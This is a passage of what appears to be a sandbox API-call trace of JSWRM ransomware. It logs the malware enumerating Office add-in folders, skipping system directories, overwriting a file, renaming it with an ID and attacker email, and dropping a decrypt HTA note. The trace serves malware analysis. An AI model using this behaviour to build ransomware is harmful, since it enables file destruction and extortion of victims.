lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0125.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.392] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6d05722, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6d05722, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d05722, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.392] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.392] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.392] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.392] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.392] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.392] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.392] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.392] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.392] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.392] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0125.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0125.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224cc8 [0125.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224cc8 | out: hHeap=0x1e0000) returned 1 [0125.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x2455a8 [0125.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0125.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0125.392] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6d50bdc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6d50bdc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6d50bdc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8040, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.392] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.392] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.393] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.393] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.393] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.393] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.393] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.393] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.393] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.393] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0125.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0125.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0125.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0125.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0125.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244708 [0125.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2455a8 | out: hHeap=0x1e0000) returned 1 [0125.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.393] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15f04999, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15f04999, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15f9d2e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x51f6c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.sr-cyrl.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.393] lstrcmpiW (lpString1="PowerViewRes.sr-cyrl.xap", lpString2=".") returned 1 [0125.393] lstrcmpiW (lpString1="PowerViewRes.sr-cyrl.xap", lpString2="..") returned 1 [0125.393] lstrcmpiW (lpString1="PowerViewRes.sr-cyrl.xap", lpString2="...") returned 1 [0125.393] lstrcmpiW (lpString1="PowerViewRes.sr-cyrl.xap", lpString2="windows") returned -1 [0125.393] lstrcmpiW (lpString1="PowerViewRes.sr-cyrl.xap", lpString2="recovery") returned -1 [0125.393] lstrcmpiW (lpString1="PowerViewRes.sr-cyrl.xap", lpString2="perflogs") returned 1 [0125.393] lstrcmpiW (lpString1="PowerViewRes.sr-cyrl.xap", lpString2="documents and settings") returned 1 [0125.393] lstrcmpiW (lpString1="PowerViewRes.sr-cyrl.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.393] lstrcmpiW (lpString1="PowerViewRes.sr-cyrl.xap", lpString2="system volume information") returned -1 [0125.393] lstrcmpiW (lpString1="PowerViewRes.sr-cyrl.xap", lpString2="msocache") returned 1 [0125.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sr-cyrl.xap", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0125.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0125.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sr-cyrl.xap", cchWideChar=24, lpMultiByteStr=0x240fe8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.sr-cyrl.xap", lpUsedDefaultChar=0x0) returned 24 [0125.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sr-cyrl.xap", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0125.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0125.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sr-cyrl.xap", cchWideChar=24, lpMultiByteStr=0x2413d0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.sr-cyrl.xap", lpUsedDefaultChar=0x0) returned 24 [0125.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0125.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244708 | out: hHeap=0x1e0000) returned 1 [0125.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0125.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-cyrl\\PowerViewRes.sr-cyrl.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-cyrl\\powerviewres.sr-cyrl.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.422] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=335724) returned 1 [0125.422] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0125.423] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.437] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.437] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.437] CloseHandle (hObject=0x338) returned 1 [0125.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0125.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0125.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0125.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x248058 [0125.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0125.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0125.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.438] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-cyrl\\PowerViewRes.sr-cyrl.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-cyrl\\powerviewres.sr-cyrl.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-cyrl\\PowerViewRes.sr-cyrl.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-cyrl\\powerviewres.sr-cyrl.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0125.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0125.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0125.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0125.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0125.439] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15f04999, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15f04999, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15f9d2e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x51f6c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.sr-cyrl.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.440] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0125.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0125.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0125.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0125.440] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x160a83ba, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x160a83ba, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="sr-latn", cAlternateFileName="")) returned 1 [0125.440] lstrcmpiW (lpString1="sr-latn", lpString2=".") returned 1 [0125.440] lstrcmpiW (lpString1="sr-latn", lpString2="..") returned 1 [0125.440] lstrcmpiW (lpString1="sr-latn", lpString2="...") returned 1 [0125.440] lstrcmpiW (lpString1="sr-latn", lpString2="windows") returned -1 [0125.440] lstrcmpiW (lpString1="sr-latn", lpString2="recovery") returned 1 [0125.440] lstrcmpiW (lpString1="sr-latn", lpString2="perflogs") returned 1 [0125.440] lstrcmpiW (lpString1="sr-latn", lpString2="documents and settings") returned 1 [0125.440] lstrcmpiW (lpString1="sr-latn", lpString2="$RECYCLE.BIN") returned 1 [0125.440] lstrcmpiW (lpString1="sr-latn", lpString2="system volume information") returned -1 [0125.440] lstrcmpiW (lpString1="sr-latn", lpString2="msocache") returned 1 [0125.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0125.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0125.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0125.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0125.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0125.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0125.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-latn\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-latn\\jswrm-decrypt.hta")) returned 0xffffffff [0125.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0125.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0125.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x2501e8 [0125.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0125.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x251fb8 [0125.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0125.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0125.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0125.443] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-latn\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-latn\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.445] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.445] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.446] CloseHandle (hObject=0x314) returned 1 [0125.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0125.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x251fb8 | out: hHeap=0x1e0000) returned 1 [0125.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0125.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0125.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0125.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0125.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0125.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0125.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0125.447] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-latn\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-latn\\jswrm-decrypt.hta")) returned 0x20 [0125.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0125.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0125.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0125.447] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-latn\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x160a83ba, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x416e6cb5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232080 [0125.447] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.447] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x160a83ba, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x416e6cb5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.447] lstrcmpiW (lpString1="..", 